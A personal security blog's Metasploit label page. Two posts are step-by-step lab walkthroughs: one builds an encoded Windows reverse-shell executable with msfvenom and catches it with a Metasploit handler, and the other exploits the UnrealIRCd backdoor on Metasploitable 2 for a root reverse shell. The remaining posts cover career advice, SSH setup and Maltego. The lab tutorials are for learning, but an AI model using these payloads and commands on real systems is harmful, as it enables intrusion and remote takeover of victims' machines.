Social Icons

Showing posts with label metasploit. Show all posts
Showing posts with label metasploit. Show all posts

Tuesday, July 12, 2016

Windows 7 Hacked @ Kali Linux - msfvenom

This post gives you a step by step way to get shell or command terminal of a victim user on Windows 7 OS from an other PC with a loaded Kali OS.The setup scenario is like this as seen in the screen shots below in a virtual box environment :

KALI LINUX : IP Address eth1 : 192.168.1.7
 Windows 7 Ultimate Machine : IP Address : 192.168.1.8
 Pinging from Kali LInux Machine to Windows 7 Machine
 Pinging from Windows 7 to Kali Linux Machine
msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tools.Now need to go to Kali terminal and execute the following command :

p /windows/meterpreter/reverse_tcp designates the payload we want to embed
LHOST designates the local host
LPORT designates the port we want to listen on
-x designates the template we want to use and the path to it
-e x86/shikata_ga_nai designates the encoder we want to use
-f exe designates we want to create an executable (.exe)
anupam.exe designates the name of the file created

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.7 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/anupam.exe
Click to Enlarge
Followed by the following sets of command :

root@kali:~# file /tmp/anupam.exe

root@kali:~# msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > show options

msf exploit(handler) > set payload windows/shell/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set LHOST 192.168.1.7

msf exploit(handler) > set LPORT 3333

msf exploit(handler) > exploit

 
Now you need to apply your skills to take the file ..anupam.exe in this case to the windows machine.In my case for example,i have placed it on the desktop as seen below :
The moment the file anupam.exe is clicked and executed from the windows machine,we get the shell on the Kali Linux machine as seen below :
Here you have the C:\ prompt from the windows machine :-)

Saturday, October 24, 2015

IRC Exploit tutorial to hack into ROOT shell : Metasploitable 2 - Kali LInux 2

1.  root is the user name that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.For the hackers and cyber criminals,getting to root shell is the key to start doing the undesired.There are thousands of ways and options to get to this vide various exploits,tricks and hacks.In this post I give a step by step with screenshot guide to get to "root" of a Metasploitable machine from a Kali Linux machine.The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.This would come handy for beginners in this domain.I have two virtual machines for this test including one Metasploitable and one Kali Linux.

Setting up the Virtual Machines

Firstly,we need to configure the host only adapter settings as shown below in the Virtual box.

Click on Network - Host only networks tab and then "Add host only adapter" as shown below :
Edit the settings of the Host only adapter
Configure the IP address to any range as you desire.I have set up as seen below :
Now I have configured my VM Kali as per the following settings shown :
The Metasploitable machine configured as seen below :
Checking PING between the two machines


Playing with the setup : Running tools and exploits

The first thing to do is to run an nmap scan and see what services are running.At the terminal window on your Kali system,type the following :

nmap -sS -Pn

In our the Metasploitable Machine IP is 192.168.56.103.The “-sS” switch in the above command asks nmap to perform a stealth scan. The “-Pn” tells nmap not to run a ping scan to see what systems are up
Running nmap command with the “-A” switch, will perform OS detection and try to determine service versions.Running the command wil give us a screen output something like as shown below : 

nmap -sS -Pn -A 192.168.56.103
There are also a lot of services running as seen above but the one in particular we are interested is an Unreal Internet Relay Chat (IRC) program as highlighted below.In the screenshot below we see the software version, in this case “Unreal IRC 3.2.8.1′′. Our next step is to use Metasploit to exploit the vulnerability.
Get to the Kali terminal and type msfconsole to get this screen as seen below : 
The basic sequence of exploiting a vulnerability goes as shown below :

- Picking an Exploit
- Setting Exploit Options
- Picking a Payload
- Setting Payload Options
- Running the Exploit
- Connecting to the Remote System

Going further now at the msf terminal type : use exploit/unix/irc/unreal_ircd_3281_backdoor
Next we need to set the RHOST as per the following terminal command:

RHOST 192.168.198.145(Metasploitable IP address )
At the msf terminal,type “show payloads” to display all payloads that work with the exploit:
Now we will use the generic reverse shell. This will give us the terminal shell with the target when the exploit is finished.Type the following at the msf terminal:

set payload cmd/unix/reverse
Show options command further will give the current settings as configured :
So we see above LHOST remains to be configured and we configure it now as follows :

Running the show options command again shows the configured setup as desired : 
and now the final bullet...simply type : exploit at the msf terminal
and here you are...right at the terminal@root
Just make a directory for testing it at the victim Metasploitable machine.I have made by the name of anupam and we see the same at the second terminal window seen in the screenshot below :
...that's it guys...any questions...most welcome...

Sunday, June 07, 2015

Career in CYBER SECURITY : Where to start ?

1.  I get a lot of queries on my blog posts related to cyber security courses and any time I am in some forum or discussion from all range age  groups regarding serious career scope in India in the field of Cyber Security.Is it worth taking a plunge in a field which currently only has more of a keen interest value rather then offering  lucrative pay packet job?The younger age group which generally has young engineering graduates look little restless of taking the risk but the field is pretty exciting for those who are passionately interested in it.

2.  The field is immense and huge to start with.For a fresher it would be pretty cumbersome to find where to start from.The moment any typical search is made for a cyber security course on google,the results are too huge and confusing to get started on.For a novice guy who doesn’t  have any background in this field but keen to start a career in this field, I would submit few first steps to start before ways and career road automatically starts guiding ahead.

3.   Firstly,make it very clear in your mind that this field is very dynamic...you have to be continuously on your toes to be updated around what’s happening in this field.Millions of cyber incidents are happening,thousands of zero days are being discovered,thousands of case studies are being released about various cyber incidents and as you start understanding you need to prioritize of what all to grasp in detail .....follow up good tweets of cyber security experts.The courses you do in this field will not be like the typical graduation certification that you do once and will make you a B.Tech for the rest of your life without ever some one asking about the syllaabi.Most of the course and certification have a shelf life of 2-3 years after which you need to renew them to continue your professional standing in the market.

4.   The best thing about this field is that you can build your career and get your basics clear by putting in you hard-work along with the world of open-source that’s your window to knowledge bank.Be it the white papers or applications or Operating systems etc most of the entire gambit of tools is free....yes...for last about 8-9 years of my association with the field I have not bought or purchased any software or OS or toolkit to practice basic hacks and penetration tests.

5.   For a start in respect of courses....I would submit that most of the courses valued globally like CEH,CISSP etc by EC-COUNCIL are pretty costly and just doing them does not guarantee anything with respect to job.You have to be aware of lots besides these courses.For a start for a typical Indian novice fresher I would recommend to start with CCCSP,CCCS etc...links given below :

http://cdac.in/index.aspx?id=cyber_security for courses offered by CDAC on cyber security and forensics.



more listed at http://anupriti.blogspot.in/2012/12/cyber-security-courses-in-india.html ....though slightly old post...but everything holds good today...

6. Besides these courses which only give a very basic over view of the field,you should start getting conversant with LINUX flavors available viz UBUNTU, Fedora, OpenSuse, Linux MInt etc to mention a few....besides a horde of excellent security distros are available with all possible youtube videos and manuals on the net for helping from scratch.Get conversant and start playing with maximum tools available in these.Few of the distros that I would recommend are listed  below :

- ARCHASSAULT at https://archassault.org/

- Kali Linux at

- BackBox at

- BackTrack R3 at

- Knoppix STD

- Pentoo

- DEFT

- Parrot

- Caine

- Samurai Web Testing framework

- Matriux Krypton

- Bugtraq

- Node zero

- Cyb org

- Helix

- Network SEcurity Toolkit

- Wireshark(not an OS)

- GRML

- Chaos

- Katana

-  Damn Vulnerable Linux

- Auditor

and I must tell you these are only few to test before you start getting basic idea of what’s happening around.

7.   You have to be passionate enough to carry yourself successfully in this field.The moment you are out of touch for whatever reasons you have a lot to catch.Every thing is available on the net..be it the study material...be it any software to start.....you actually do not straight away enrol for a course..prepare yourself with the basics as available vide these distros...basic linux and then do some course to start building your documented profile.If you have reached reading here and you have queries you can get back to me here ....post a comment.

Sunday, November 23, 2014

Setting up Metasploit on a BackTrack5 R3 VM with SSH connectivity@Putty

1.    Setting this up is a simple thing till the time you know how to do it...here I bring you a step by step thing of how you putty to a Backtrack5 v3 machine installed in a Virtual Box from a Ubuntu host OS....

2.    First thing is configuring a additional network card on the BTR3 machine.Select the virtual machine and click on Settings,then move to Network settings and then in the Network adapter, there will be a pre-installed NAT adapter for internet usage of the host machine.Under Adapter 2 select Host only Adapter.

Adapter 1 Default Configuration
 Adapter 2 to be Configured
Before you get ready to ssh...u need to ensure that ssh service is running in Backtrack...which by default is not...run the terminal commands as seen below in the screen shots...


ifconfig as seen at terminal of the Backtrack R3 machine
 Putty to IP of the Backtrack Machine
Putty successfully asks for login as seen below :

 Login with Backtrack credentials :
Here  above we get the msfconsole...ready to accept the commands....

Saturday, August 16, 2014

Maltego : Open source Intelligence and Forensics Application

1.  In this post I am giving a stepped screen shot for installing and using the application MALTEGO that comes inbuilt to Kali Linux.Maltego, is an open source intelligence and forensics application. It allows for the mining and gathering of information as well as the representation of information in a meaningful way. Coupled with its graphing libraries, Maltego, allows  to identify key relationships between information and identify previously unknown relationships between them. It is a must-have tool in the forensics.security and intelligence fields.

2.   Maltego permits creating custom entities, allowing it to represent any type of information in addition to the basic entity types which are part of the software. The basic focus of the application is analyzing real-world relationships between people, groups, websites, domains, networks, internet infrastructure, and affiliations with online services such as Twitter and Facebook.

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

(CLICK TO ENLARGE)

Powered By Blogger